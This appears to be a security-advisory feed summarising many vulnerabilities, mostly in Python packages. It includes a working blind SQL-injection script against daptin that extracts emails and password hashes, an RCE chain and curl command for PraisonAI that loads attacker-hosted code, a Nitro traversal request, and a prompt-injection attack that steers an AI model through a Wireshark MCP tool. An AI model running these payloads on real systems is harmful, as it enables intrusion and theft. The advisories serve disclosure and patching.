Decompression bomb protection bypass in Netty's HttpContentDecompressor and DelegatingDecompressorFrameListener allows remote unauthenticated attackers to trigger out-of-memory denial of service by switching Content-Encoding from gzip to brotli, zstd, or snappy. The configured maxAllocation parameter correctly limits gzip/deflate decompression but is silently ignored for these alternative encodings, enabling attackers to decompress gigabytes of data from kilobyte-sized payloads. Affects both HTTP/1.1 (netty-codec-http) and HTTP/2 (netty-codec-http2) implementations. CVSS 7.5 (High) with network vector, low complexity, and no authentication required. Vendor-released patches available: versions 4.1.133.Final and 4.2.13.Final. No active exploitation confirmed at time of analysis, but publicly disclosed proof-of-concept demonstrates trivial header-based bypass requiring only changing 'Content-Encoding: gzip' to 'Content-Encoding: br'.

Denial Of Service Java Python
NVD GitHub VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

A proxy route rule like: ```ts routeRules: { "/api/orders/**": { proxy: { to: "http://upstream/orders/**" } } } ``` is intended to limit the proxy to URLs under `/api/orders/`. Before the patch, an attacker could bypass that scope by sending percent-encoded path traversal (`..%2f`) in the URL, causing Nitro to forward a request that the upstream resolved outside the configured scope. Example exploit: ``` GET /api/orders/..%2fadmin%2fconfig.json ``` Nitro sees `..%2f` as opaque characters at match time, the `/api/orders/**` rule matched, and the raw path was forwarded to the upstream as `/orders/..%2fadmin/config.json`. An upstream that decodes `%2F` to `/` then resolved `..` and can serve `/admin/config.json` outside the intended scope. ### Are you affected? Users may be affected if **ALL** of the following are true: 1. Their project uses Nitro's `routeRules` with a `proxy` entry (`{ proxy: { to: "..." } }`). 2. The proxy `to` value uses a `/**` wildcard suffix to forward sub-paths. 3. The **upstream** behind the proxy decodes `%2F` as `/` before routing or filesystem lookup. 4. Proxy route rules are _not_ handled natively at CDN (nitro v3 and vercel) Whether the bypass actually leaks data depends on the upstream. Modern JS frameworks keep `%2F` opaque per RFC 3986 and are safe by construction. - **Safe examples:** H3 v2, Express v5, Hono v4 - modern JS frameworks keep `%2F` opaque per RFC 3986. - **Vulnerable examples:** naive imlementations that decodes the URL, static file servers, CGI dispatchers, Python `os.path`-based routing, anything sitting behind another layer that decodes `%2F` (common in microservice meshes). ## Impact Any HTTP path reachable from the Nitro server to the upstream could be requested, regardless of the configured `/**` scope. In typical deployments (API gateway, BFF, microservice proxy) this could expose internal admin endpoints, secrets endpoints, or other services the developer believed the scope rule fenced off. ## Patched versions Upgrade to one of: - [2.13.4](https://github.com/nitrojs/nitro/releases/tag/v2.13.4) or later (https://github.com/nitrojs/nitro/pull/4223) - [3.0.260429-beta](https://github.com/nitrojs/nitro/releases/tag/v3.0.260429-beta) or later (https://github.com/nitrojs/nitro/pull/4222) The fix canonicalizes the incoming pathname before building the upstream URL and rejects requests with `400 Bad Request` if the resolved path would escape the rule's base. The bytes forwarded upstream are unchanged when the request is allowed. > Note: the fix assumes the upstream does not double-decode percent-encoding. If your upstream decodes twice (`%252F → %2F → /`), it remains your responsibility to harden it. **Single-decode is standard**. ## Credits Reported by [@mHe4am](https://github.com/mHe4am) ([@he4am on HackerOne](https://hackerone.com/he4am)) via the [Vercel Open Source](https://hackerone.com/vercel-open-source?type=team) program.

Python Path Traversal
NVD GitHub
EPSS 0% CVSS 7.1
HIGH PATCH This Week

## Summary `processFuzzySearch` in `server/resource/resource_findallpaginated.go:1484` splits the user-supplied `column` parameter by comma and interpolates each segment directly into `goqu.L(fmt.Sprintf("LOWER(%s) LIKE ?", prefix+col))` raw SQL with no column whitelist check. The entry point is `GET /api/<entity>` with `operator=fuzzy` (or `fuzzy_any`, `fuzzy_all`). Any authenticated user - including one who self-registered with no admin involvement - can read the entire database. --- ## Details At `resource_findallpaginated.go:1761`, when the operator is `fuzzy`, `fuzzy_any`, or `fuzzy_all`, execution routes to `processFuzzySearch` (line 1763) before `processQueryFilter` (line 1780). `processQueryFilter` is the only path that calls `GetColumnByName` (line 1351), which validates column names against the table schema. The fuzzy branch never reaches that check. Inside `processFuzzySearch` (line 1484), `filterQuery.ColumnName` is split by comma. After `strings.TrimSpace` (line 1486), each segment is routed to a DB-driver-specific function. The injectable sink reached depends on the driver and the `fuzzy_options.fallback_mode` field. **SQLite** (`processFuzzySearchSQLite`, lines 1632-1676) uses `goqu.L` in all code paths - no `fallback_mode` required: - `goqu.L(fmt.Sprintf("LOWER(%s) LIKE ?", prefix+col), ...)` - line 1650/1657 **PostgreSQL, MySQL, MSSQL** default to `goqu.Ex` (identifier-quoted, not injectable). The `goqu.L` sink is only reached when the attacker supplies a specific `fuzzy_options.fallback_mode` value in the HTTP `query` JSON: - PostgreSQL `word_boundary` mode (line 1540): `goqu.L(fmt.Sprintf("%s ~* ?", prefix+col), ...)` - MySQL `soundex` mode (line 1598): `goqu.L(fmt.Sprintf("SOUNDEX(%s) = SOUNDEX(?)", prefix+col), ...)` - MSSQL `soundex` mode (line 1694): `goqu.L(fmt.Sprintf("DIFFERENCE(%s, ?) >= 3", prefix+col), ...)` `fuzzy_options` is deserialized from the HTTP request at line 243 (`json.Unmarshal([]byte(query[0]), &queries)`) - it is fully attacker-controlled. `goqu.L` emits its first argument as a raw SQL literal. The column position uses `%s` string formatting, not a bound parameter. `prefix` is fixed at line 351 as `dbResource.model.GetName() + "."` - for `/api/world` this is `"world."`. Against SQLite, an attacker-supplied column value of `reference_id) OR 1=1 OR LOWER(world.reference_id` expands in the WHERE clause to `LOWER(world.reference_id) OR 1=1 OR LOWER(world.reference_id) LIKE ?`. Against PostgreSQL (where `reference_id` is stored as `bytea`), the `~*` regex operator requires a text-type column; the attack targets a `varchar` column instead (e.g., `table_name`) with an adapted injection template. **Relation to GHSA-rw2c-8rfq-gwfv**: That patch modified `resource_aggregate.go` to fix `/aggregate/:typename`. This vulnerability is in `resource_findallpaginated.go` on the `/api/<entity>` fuzzy path - different file, different endpoint, different operator. The existing patch does not cover this path. **Tested:** SQLite injection dynamically confirmed (boolean-blind extraction, email extracted). PostgreSQL `word_boundary` injection dynamically confirmed (baseline=0 rows, tautology=5 rows, email=`guest@cms.go` extracted via text column). MySQL and MSSQL confirmed by code review; MySQL binary panics on initialization in the test harness (unrelated daptin bug), dynamic verification not performed. **Fix**: Add a `GetColumnByName` whitelist check in `processFuzzySearch` (line 1484) before the comma-split, matching the pattern in `processQueryFilter:1351`. All four DB driver sinks require fixing. --- ## PoC **Environment:** ```bash git clone https://github.com/daptin/daptin cd daptin git checkout 5d3214244890989eceefa694bfc976ef11458721 go build -o daptin-server . ./daptin-server # listens on :6336, SQLite backend by default ``` **poc.py** (Python 3, no dependencies): ```python import json, urllib.request, urllib.parse BASE = "http://localhost:6336" def post(path, body): req = urllib.request.Request(BASE + path, json.dumps(body).encode(), {"Content-Type": "application/json"}) try: return json.loads(urllib.request.urlopen(req, timeout=10).read(50_000)) except urllib.request.HTTPError as e: return json.loads(e.read(50_000)) def token(): post("/action/user_account/signup", {"attributes": { "name": "poc", "email": "poc@test.com", "password": "adminadmin", "passwordConfirm": "adminadmin"}}) body = post("/action/user_account/signin", {"attributes": { "email": "poc@test.com", "password": "adminadmin"}}) return next(i["Attributes"]["value"] for i in body if i.get("ResponseType") == "client.store.set") def rows(col, jwt): q = urllib.parse.urlencode({"query": json.dumps( [{"column": col, "operator": "fuzzy", "value": "zzzzz"}])}) req = urllib.request.Request(f"{BASE}/api/world?{q}&page%5Bsize%5D=5", headers={"Authorization": "Bearer " + jwt}) d = json.loads(urllib.request.urlopen(req, timeout=10).read(50_000)) return len(d.get("data", [])) def oracle(expr, jwt): col = f"reference_id) OR ({expr}) OR LOWER(world.reference_id" return rows(col, jwt) > 0 def extract_int(sql, jwt, hi=200): lo = 0 while lo < hi: mid = (lo + hi + 1) // 2 if oracle(f"({sql}) >= {mid}", jwt): lo = mid else: hi = mid - 1 return lo def extract_str(sql, jwt, maxlen=80): n = extract_int(f"LENGTH(({sql}))", jwt, hi=maxlen) s = "" for _ in range(n): lo, hi = 32, 126 while lo < hi: mid = (lo + hi) // 2 pfx = s.replace("'", "''") expr = f"({sql}) >= '{pfx}'||char({mid+1})" if s else f"({sql}) >= char({mid+1})" if oracle(expr, jwt): lo = mid + 1 else: hi = mid s += chr(lo) return s jwt = token() print("baseline :", rows("reference_id", jwt), "rows") print("tautology:", rows("reference_id) OR 1=1 OR LOWER(world.reference_id", jwt), "rows") jwt = token() print("sqlite_master table count:", extract_int("SELECT count(*) FROM sqlite_master WHERE type='table'", jwt, hi=80)) print("email (row 1):", extract_str("SELECT email FROM user_account ORDER BY id LIMIT 1", jwt)) pw_hex = extract_str("SELECT HEX(password) FROM user_account WHERE email='poc@test.com' LIMIT 1", jwt, maxlen=40) print("pw hash prefix:", bytes.fromhex(pw_hex).decode("ascii", errors="replace")) ``` **Output** (measured on commit `5d32142`, SQLite, macOS arm64): ``` baseline : 0 rows tautology: 5 rows sqlite_master table count: 57 email (row 1): guest@cms.go pw hash prefix: $2a$11$W7vO9oOPzpf7u ``` --- ## Impact **Attacker precondition**: One valid JWT. Self-signup is enabled by default on a fresh daptin instance - no admin involvement required. **What is impacted**: The full database is readable via boolean-blind extraction, including all tables visible in `sqlite_master` and credential data (emails, bcrypt password hashes) in `user_account`. Extraction rate is approximately 7 HTTP requests per character, making full-database extraction feasible.

SQLi PostgreSQL Python +2
NVD GitHub
EPSS 0% CVSS 8.4
HIGH PATCH This Week

## TL;DR CVE-2026-40287's fix gated `tools.py` auto-import behind `PRAISONAI_ALLOW_LOCAL_TOOLS=true` in **two** files (`tool_resolver.py`, `api/call.py`). A **third** import sink in `praisonai/templates/tool_override.py` was missed and remains unguarded. It is reached by the recipe runner on every recipe execution and is **remotely** triggerable through `POST /v1/recipes/run` with a `recipe` value pointing at any local absolute path *or* any GitHub repo (because `SecurityConfig.allow_any_github` defaults to `True`). The attacker drops a `tools.py` next to `TEMPLATE.yaml`; the server `exec_module()`s it. No auth required by default, no environment opt-in required. ## Patch coverage gap CVE-2026-40287 was fixed in v4.5.139 by adding an env-var gate at: | File | Line | Gate | |---|---|---| | `praisonai/tool_resolver.py` | 77 | `if os.environ.get("PRAISONAI_ALLOW_LOCAL_TOOLS", "").lower() != "true":` | | `praisonai/api/call.py` | 80 | same | But the equivalent sinks in `praisonai/templates/tool_override.py` were **not** patched: ```python # tool_override.py - create_tool_registry_with_overrides() 332 cwd_tools_py = Path.cwd() / "tools.py" 333 if cwd_tools_py.exists(): 334 try: 335 tools = loader.load_from_file(str(cwd_tools_py)) # <-- exec_module 336 registry.update(tools) 337 except Exception: 338 pass 339 341 # 4. Template-local tools.py 342 if template_dir: 343 tools_py = Path(template_dir) / "tools.py" 344 if tools_py.exists(): 345 try: 346 tools = loader.load_from_file(str(tools_py)) # <-- exec_module 347 registry.update(tools) 348 except Exception: 349 pass ``` `load_from_file` (line 84-94) ends in `spec.loader.exec_module(module)` with no allowlist, no signature check, no env gate. Both call sites run unconditionally on every recipe execution. ## Attack chain ``` HTTP POST /v1/recipes/run body: {"recipe": "<abs path>" | "github:<owner>/<repo>/<recipe>"} │ ▼ recipe/serve.py:483 run_recipe(request) ← auth=none default │ ▼ recipe/core.py:215 recipe.run(name, ...) │ ▼ recipe/core.py:686 _load_recipe(name) └─ ".." check only; absolute paths and URIs allowed │ ▼ templates/loader.py:94 TemplateLoader.load(uri) │ ▼ templates/security.py:130 is_source_allowed("github:*") └─ allow_any_github=True default → returns True │ ▼ templates/registry.py fetch repo from raw.githubusercontent.com → cache dir │ ▼ templates/security.py:215 validate_template_directory(cached.path) └─ .py is in allowed_extensions → tools.py kept │ ▼ recipe/core.py:887 _execute_recipe(recipe_config, ...) │ ▼ recipe/core.py:943 create_tool_registry_with_overrides( include_defaults=True, template_dir=recipe_config.path) │ ▼ templates/tool_override.py:341-349 load_from_file(template_dir/tools.py) │ ▼ templates/tool_override.py:94 spec.loader.exec_module(module) ← RCE ``` The tool registry build runs *before* any LLM/agent step, so `OPENAI_API_KEY` and similar are not required. A recipe with an empty `workflow.steps: []` is sufficient - the payload fires during registry construction. ## Confirmed execution (2026-04-25, praisonai 4.6.31) ``` SERVER stdout (PID 43784): Uvicorn running on http://127.0.0.1:8765 127.0.0.1 - POST /v1/recipes/run HTTP/1.1 [CVE-2026-40287-bypass] RCE fired. Marker written to: …/praisonai_pwn_1777094071.txt 127.0.0.1 - "POST /v1/recipes/run" 500 Internal Server Error Marker file: pid: 43784 ← matches server PID argv: ['server.py'] ← server process, not exploit ``` The 500 response is a downstream side-effect of `workflow.steps: []` failing to construct a runnable workflow; the `exec_module(tools.py)` call runs *before* that error. The attacker payload has already executed in the server process by the time the 500 is sent. ## Reproduction (local-path variant) Files under `pocs/praisonai-cve-2026-40287-bypass/`: - [evil_recipe/TEMPLATE.yaml](https://github.com/user-attachments/files/27079207/TEMPLATE.yaml) - minimal recipe metadata - [evil_recipe/tools.py](https://github.com/user-attachments/files/27079210/tools.py) - payload (writes a marker file in tempdir) - [server.py](https://github.com/user-attachments/files/27079211/server.py) - starts `praisonai.recipe.serve.create_app({})` on `127.0.0.1:8765` (default `auth: none`) - [exploit.py](https://github.com/user-attachments/files/27079214/exploit.py) - single POST to `/v1/recipes/run` ```bash pip install 'praisonai[serve]==4.6.31' # Terminal 1 python server.py # Terminal 2 python exploit.py ``` Expected: server stdout shows `[CVE-2026-40287-bypass] RCE fired.`; a `praisonai_pwn_<timestamp>.txt` file appears in the system temp directory containing user, host, pid, cwd captured from inside the server process. ## Reproduction (remote GitHub variant) ```bash # Push evil_recipe/ to https://github.com/<you>/poc-recipe (public repo) curl -X POST http://target:8765/v1/recipes/run \ -H 'Content-Type: application/json' \ -d '{"recipe":"github:<you>/poc-recipe/poc-recipe"}' ``` No filesystem prerequisite on the target. Triggers because `SecurityConfig.allow_any_github` (templates/security.py:30) defaults to `True`.

Python Code Injection RCE
NVD GitHub
EPSS 0% CVSS 7.8
HIGH POC PATCH This Week

Arbitrary code execution via Git hook redirection in GitPython 3.1.48 and earlier allows local authenticated users to inject malicious core.hooksPath configuration through newline characters in config_writer().set_value(). Publicly available exploit code exists. The vulnerability enables persistent repository poisoning where attacker-controlled hooks execute with the privileges of any user performing Git operations (commit, merge, checkout) on the poisoned repository. Particularly dangerous in multi-tenant environments like MLRun, DVC, MLflow, or Kedro where shared repositories enable privilege escalation across user contexts. Fixed in GitPython 3.1.49.

Python Code Injection RCE +1
NVD GitHub VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

CPU exhaustion in python-multipart allows remote unauthenticated attackers to cause denial of service through crafted multipart/form-data requests with unbounded header blocks. Applications using Starlette, FastAPI, or other ASGI frameworks that parse attacker-controlled file uploads are vulnerable to worker thread starvation and event-loop blocking. Vendor-released patch available in version 0.0.27, which enforces default limits on both header count and individual header size during multipart parsing.

Denial Of Service Python
NVD GitHub
EPSS 0% CVSS 8.8
HIGH POC PATCH This Week

DNS rebinding in rmcp Rust crate allows malicious websites to control local MCP servers and achieve arbitrary code execution through exposed developer tools. Fixed in version 1.4.0 via Host header validation with loopback-only default allowlist. The vulnerability affects Streamable HTTP server transport only (stdio and child-process transports unaffected). Vendor-released patch available (PR #764, commit 8e22aa2). Similar vulnerabilities patched across TypeScript, Python, Go, and Java MCP SDKs indicate coordinated disclosure. CVSS 8.8 (network vector, low complexity, requires user interaction) reflects browser-mediated attack requiring victim to visit attacker site.

Python RCE Java +1
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

### Summary The `extract_hidden_states` speculative decoding proposer in vLLM returns a tensor with an incorrect shape after the first decode step, causing a `RuntimeError` that crashes the EngineCore process. The crash is triggered when any request in the batch uses sampling penalty parameters (`repetition_penalty`, `frequency_penalty`, or `presence_penalty`). A single request with a penalty parameter (e.g., `"repetition_penalty": 1.1`) is sufficient to crash the server. The crash is deterministic and immediate - no concurrency, race condition, or special workload is required. ### Details In vLLM v0.17.0, the `extract_hidden_states` proposer's `propose()` method returned `sampled_token_ids.unsqueeze(-1)`, producing a tensor of shape `(batch_size, 1)`. In [PR #37013](https://github.com/vllm-project/vllm/pull/37013) (first released in v0.18.0), the KV connector interface was refactored out of `propose()`. The return type changed from `tuple[Tensor, KVConnectorOutput | None]` to `Tensor`, and the `.unsqueeze(-1)` call was removed along with the KV connector output: ```python # Before (v0.17.0): return sampled_token_ids.unsqueeze(-1), kv_connector_output # shape (batch_size, 1) # After (v0.18.0+): return sampled_token_ids # shape (batch_size, 2) after first decode step ``` The refactor missed that `sampled_token_ids` changed semantics between the first and subsequent decode steps. After the first decode step, the rejection sampler allocates its output as `(batch_size, max_spec_len + 1)`. With `num_speculative_tokens=1`, this produces shape `(batch_size, 2)` instead of the expected `(batch_size, 1)`, causing a broadcast shape mismatch during penalty application. ### Impact Any vLLM deployment between v0.18.0 and v0.19.1 (inclusive) configured with `extract_hidden_states` speculative decoding is affected. A single API request containing any penalty parameter immediately and permanently crashes the EngineCore process, resulting in complete loss of service availability. ### Patches Fixed in [PR #38610](https://github.com/vllm-project/vllm/pull/38610), first included in vLLM v0.20.0. The fix slices the return value to `sampled_token_ids[:, :1]`, ensuring the correct `(batch_size, 1)` shape regardless of the rejection sampler's output dimensions. ### Workarounds - Upgrade to vLLM v0.20.0 or later. - If upgrading is not possible, avoid using `extract_hidden_states` as the speculative decoding method on affected versions. - Alternatively, reject or strip penalty parameters (`repetition_penalty`, `frequency_penalty`, `presence_penalty`) from incoming requests at an API gateway before they reach vLLM.

Python Denial Of Service
NVD GitHub VulDB
EPSS 0% CVSS 8.7
HIGH PATCH This Week

Path traversal in Mako Templates (Python library) on Windows platforms allows attackers to read arbitrary files outside configured template directories via backslash-based directory traversal sequences. Affects Mako versions ≤1.3.11 when applications accept user-controlled template names on Windows systems. Vendor-released patch available in version 1.3.12 (confirmed by GitHub commit 72e10c5). No public exploit code identified at time of analysis, though exploitation conditions are straightforward when prerequisites are met.

Python Microsoft Path Traversal +2
NVD GitHub
EPSS 0% CVSS 5.9
MEDIUM PATCH This Month

Granian worker process aborts when a WSGI application returns invalid HTTP response header names or values due to unhandled panic in the header conversion path. An attacker who can influence WSGI application output, such as by injecting user-controlled data into response headers like Location or Content-Disposition, can trigger worker process denial of service. The vulnerability affects Granian versions 0.2.0 through 2.7.3; patch available in version 2.7.4. Proof of concept demonstrates crashes via headers containing spaces, CRLF injection, or null bytes.

Python Denial Of Service
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Granian ASGI server suffers remote denial of service when unauthenticated attackers send malformed WebSocket upgrade requests containing non-ASCII bytes in the Sec-WebSocket-Protocol header, causing worker process termination. Each crafted request kills one worker process; sequential requests across all workers achieve complete service outage. The vulnerability exists in Granian's pre-application WebSocket scope construction (src/asgi/utils.rs), making application-layer defenses ineffective. Publicly available exploit code exists with complete proof-of-concept demonstrating the attack. Vendor-released patch 2.7.4 addresses the issue for affected versions 1.2.0 through 2.7.3.

Python Denial Of Service
NVD GitHub
EPSS 0% CVSS 9.9
CRITICAL PATCH Act Now

Complete account takeover in wger Python fitness management platform allows authenticated gym managers with no gym assignment (gym=None) to reset passwords of any other unaffiliated user and receive the new plaintext password in the HTTP response body. The vulnerability stems from a Django ORM authorization check that incorrectly evaluates None != None as False, bypassing the tenant isolation guard. Newly registered users default to gym=None state, making every public-registration wger deployment vulnerable. CVSS 9.9 Critical severity with scope change (cross-tenant impersonation). GitHub advisory GHSA-mhc8-p3jx-84mm confirms exploitation requires only low privilege (delegated gym.manage_gym permission) with no user interaction, enabling permanent victim lockout as original passwords are invalidated.

Authentication Bypass Python Docker
NVD GitHub
EPSS 0% CVSS 7.8
HIGH POC PATCH This Week

Path traversal in GitPython versions ≤3.1.47 enables arbitrary file write and deletion outside repository boundaries when applications pass attacker-controlled reference paths to reference creation, rename, or delete operations. A fully-functional proof-of-concept demonstrates successful exploitation by crafting reference names with '../../../' sequences to escape the `.git` directory and manipulate files with the process owner's permissions. Applications exposing GitPython reference APIs to user input-particularly Git automation services, CI/CD pipelines, and multi-tenant developer platforms-are at immediate risk, as no authentication is required at the library boundary. Fixed in version 3.1.48 per GitHub advisory GHSA-7545-fcxq-7j24.

Python Denial Of Service Path Traversal +2
NVD GitHub VulDB
EPSS 0% CVSS 8.1
HIGH PATCH This Week

LDAP filter injection in Netflix Lemur certificate management platform allows authenticated users with valid LDAP credentials to escalate privileges to administrator by injecting metacharacters into the username field during login. Attackers manipulate group membership queries to gain unauthorized admin roles, enabling access to all certificates, private keys via /certificates/<id>/key endpoint, and CA configurations. Vendor-released patch confirmed in version 1.9.0 (GitHub advisory GHSA-3r34-vq8m-39gh). CVSS 8.1 indicates high confidentiality and integrity impact with low attack complexity from network-authenticated attackers. No public exploit code identified at time of analysis, though detailed reproduction steps exist in the advisory.

Authentication Bypass Python Privilege Escalation +2
NVD GitHub
EPSS 0% CVSS 6.8
MEDIUM PATCH This Month

Man-in-the-middle attacks can intercept LDAP credentials in Lemur when LDAP TLS is enabled because the authentication module globally disables TLS certificate verification using `ldap.OPT_X_TLS_NEVER`. Attackers positioned between Lemur and the LDAP server can capture plaintext usernames and passwords, modify LDAP group responses to grant admin access, and compromise the entire PKI infrastructure managed by Lemur. The vulnerability affects Lemur versions before 1.9.0 and is confirmed fixed in version 1.9.0.

Python RCE OpenSSL
NVD GitHub
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

PyLoad-ng WebUI discloses internal Python stack traces and source file paths to unauthenticated remote attackers via a global exception handler on the `/web/<path:filename>` endpoint. An attacker can request non-existent templates or craft malformed requests to trigger server exceptions and extract implementation details in HTTP responses without authentication. This information disclosure facilitates reconnaissance for follow-on attacks but does not enable direct code execution or data theft.

Python Information Disclosure
NVD GitHub VulDB
HIGH PATCH This Week

Malformed reference links in Mistune 3.2.0 trigger algorithmic complexity attacks in the parse_link_title() function, causing 100% CPU consumption and permanent process hangs. The vulnerability affects Python applications processing untrusted Markdown content, enabling remote denial-of-service through minimal-size payloads (the provided POC is under 200 bytes). A publicly available proof-of-concept demonstrates consistent exploitation discovered via coverage-guided fuzzing. Vendor patch 3.2.1 addresses the issue by implementing parsing limits and defensive checks.

Suse Denial Of Service Python
NVD GitHub
EPSS 0% CVSS 8.7
HIGH PATCH This Week

Regular Expression Denial of Service in mistune's link title parser enables attackers to freeze Python applications with 58-byte Markdown payloads. The LINK_TITLE_RE regex in mistune 3.0.0a1 through 3.2.0 exhibits catastrophic backtracking (O(2^N) time complexity) when parsing link titles with repeated escaped punctuation patterns, blocking a parser thread for approximately 6 seconds on modern hardware with exponential growth per additional byte pair. Publicly available exploit code exists (demonstrated in the GitHub advisory with working PoC), enabling trivial weaponization against web applications, documentation systems, Jupyter tooling, and API endpoints that process user-supplied Markdown. CVSS 8.7 (CVSS:4.0/AV:N/AC:L/PR:N/UI:N/VA:H) reflects the network-accessible, zero-prerequisite nature of the attack, though the High availability impact assumes single-threaded parsing or resource-constrained environments.

Denial Of Service Apple Python
NVD GitHub VulDB
EPSS 0% CVSS 9.0
CRITICAL POC PATCH Act Now

SQL injection in Rucio's DID search API allows any authenticated user to execute arbitrary SQL against the PostgreSQL metadata database when the postgres_meta plugin is configured. The vulnerability exists in FilterEngine.create_postgres_query where attacker-controlled filter parameters are interpolated directly into raw SQL via Python str.format. Exploitation enables complete database compromise including extraction of authentication tokens, password hashes (SHA-256 single-iteration, GPU-crackable), storage credentials, and session hijacking. Remote code execution is possible via PostgreSQL COPY...FROM PROGRAM if database privileges permit. CVSS 9.9 (Critical) reflects the scope change and cascading impact across confidentiality, integrity, and availability. No public exploit identified at time of analysis, but attack complexity is low (AC:L) requiring only basic authenticated access.

PostgreSQL Python SQLi +1
NVD GitHub
EPSS 0% CVSS 9.4
CRITICAL POC PATCH Act Now

SQL injection in Rucio's DID search API allows any authenticated user to execute arbitrary SQL on Oracle database backends, enabling complete database compromise. The vulnerability affects Rucio versions 1.27.0 through 40.1.0 when deployed with Oracle databases using the default json_meta plugin. Attackers can extract authentication tokens, password hashes (SHA-256 single-iteration, GPU-crackable), storage credentials, and all managed data. Data modification and potential remote code execution via Oracle PL/SQL features are possible. Vendor-confirmed vulnerability with patches released across four version branches. PostgreSQL and MySQL deployments are not affected due to proper SQLAlchemy parameterization on those database dialects.

SQLi PostgreSQL Java +3
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Remote denial of service in vLLM 0.6.1 through 0.19.x allows unauthenticated attackers to crash worker processes by sending text-only prompts containing special multimodal placeholder tokens (e.g., '<|vision_start|><|image_pad|><|vision_end|>') without corresponding image or video data. The vulnerability stems from unprotected array indexing in the input position computation layer when processing vision tokens, causing an IndexError that terminates the worker and degrades service availability. A single malicious request can trigger the fault.

Python Denial Of Service
NVD GitHub
EPSS 0% CVSS 3.2
LOW PATCH Monitor

The discover_pipeline_files() function in ciguard v0.8.0-0.8.1 follows symlinks during directory traversal without validating that discovered paths remain within the scan root, allowing an attacker who plants symlinks in a scanned directory to cause the MCP server to leak file paths and contents from sensitive locations such as ~/.aws/, ~/.config/, and /etc/. This information disclosure vulnerability affects users of ciguard integrated with Claude Desktop, Claude Code, or Cursor, and is patched in v0.8.2 with default symlink following disabled and path validation applied.

Python Information Disclosure
NVD GitHub
EPSS 0% CVSS 7.7
HIGH PATCH This Week

Server-Side Request Forgery (SSRF) in AVideo versions up to 29.0 allows authenticated attackers to exfiltrate cloud metadata credentials and access internal services via HTTP redirect bypass and DNS rebinding attacks. Two endpoints in AVideo's AI plugin and EPG parser validate user-supplied URLs using isSSRFSafeURL() but then fetch them with file_get_contents() using PHP's default automatic redirect following. An attacker supplies a URL to a controlled server returning a 302 redirect to internal resources (e.g., AWS instance metadata at 169.254.169.254), bypassing SSRF protections since only the initial URL is validated. Vendor-released patch available via GitHub commit 603e7bf7. CVSS 7.7 reflects Changed Scope due to cross-boundary access to cloud infrastructure credentials.

Python SSRF PHP
NVD GitHub
EPSS 0% CVSS 9.1
CRITICAL POC PATCH Act Now

Remote code execution in Grav CMS versions prior to 2.0.0-beta.2 allows authenticated administrators to deploy malicious PHP web shells by uploading crafted ZIP files through the Direct Install tool at /admin/tools/direct-install. The vulnerability combines insufficient ZIP archive content validation (Zip Slip primitive via path traversal) with the design-level acceptance of arbitrary plugin PHP code. Publicly available exploit code exists, demonstrating automated login, nonce extraction, malicious plugin upload, and persistent shell deployment. CVSS 9.1 (Critical) reflects network-accessible RCE with scope change, though exploitation requires high privileges (admin role). No EPSS or KEV data available at time of analysis.

Microsoft PHP CSRF +4
NVD GitHub Exploit-DB VulDB
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Arbitrary local file disclosure in changedetection.io allows remote unauthenticated attackers to read sensitive system files via crafted backup archives. When a malicious backup ZIP is uploaded and restored, the application trusts attacker-controlled paths in the history.txt file, enabling reads of files like /etc/passwd, environment variables, application secrets, and mounted Docker volumes through the Preview UI or history API. This vulnerability (CVSS 7.5) affects all versions through 0.54.10, with fix available in 0.55.1. No active exploitation (KEV) confirmed, but a detailed proof-of-concept exists demonstrating the complete attack chain from backup modification to file exfiltration. EPSS data not available, but the combination of network attack vector, no authentication requirement, and public exploit code makes this a priority for immediate patching.

Python Docker RCE
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Path traversal in PyLoad-ng package folder name sanitization allows authenticated users with ADD permission to write files outside the intended download directory via insufficient string replacement logic. The sanitizer replaces `../` with `_`, but the pattern `....//` bypasses this filter by becoming `.._` after replacement, leaving exploitable `..` sequences that the OS later resolves. CVSS 6.5 (network-accessible, low complexity, requires low-privilege authentication, high integrity impact). Publicly available proof-of-concept code demonstrates exploitation against default credentials.

Python Path Traversal
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Remote denial of service in Twisted's DNS name decompression (twisted.names module) allows unauthenticated attackers to freeze the single-threaded reactor by sending a crafted TCP DNS packet with deeply chained compression pointers and thousands of questions. Publicly available exploit code exists. Despite high CVSS score (7.5), real-world impact is limited to applications using the twisted.names DNS server-not the broader Twisted framework. Vendor-released patch available in version 26.4.0rc2.

Denial Of Service Python Suse
NVD GitHub VulDB
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Privilege escalation in JupyterLab 4.0.0 through 4.5.6 allows authenticated users to bypass extension allow-list controls and install arbitrary PyPI packages, enabling potential data exfiltration and lateral movement in multi-tenant deployments. The PyPI Extension Manager failed to enforce the `allowed_extensions_uris` configuration, permitting installation of packages outside the approved list. This vulnerability is particularly critical in shared educational environments (JupyterHub) and multi-tenant deployments where kernel/terminal access is restricted. Vendor-released patch available in JupyterLab v4.5.7. No public exploit identified at time of analysis, though exploitation requires only authenticated access with low complexity (CVSS AC:L).

Python Privilege Escalation
NVD GitHub VulDB
EPSS 0% CVSS 6.8
MEDIUM This Month

Arbitrary file write in wireshark-mcp up to version 1.1.5 allows remote attackers to write files to any filesystem location via prompt injection in pcap payloads that trigger the wireshark_export_objects MCP tool. The vulnerability exploits missing mandatory path restrictions when the WIRESHARK_MCP_ALLOWED_DIRS environment variable is not configured (default state). An attacker can craft a malicious pcap with embedded HTTP objects bearing filenames like authorized_keys, manipulate an AI model using the MCP server into calling export_objects with dest_dir=/home/user/.ssh/, and achieve SSH access, cron hijacking, or web shell placement. Publicly available proof of concept confirms exploitation against version 1.1.5 with tshark 4.6.4; no vendor-released patch exists at time of analysis.

Python Path Traversal
NVD GitHub
EPSS 0% CVSS 9.9
CRITICAL PATCH Act Now

Path traversal in django-s3file's S3FileMiddleware allows attackers to manipulate HTTP requests and force Django applications to load arbitrary files from unintended S3 locations into request.FILES, bypassing pre-signed upload location restrictions. Affects all versions <=7.0.1. Vendor-confirmed vulnerability with patch released in version 7.0.2. No active exploitation confirmed (not in CISA KEV). CVSS metrics not available, but path traversal combined with file handling operations presents moderate confidentiality and integrity risk depending on application-specific file processing logic.

Python Path Traversal
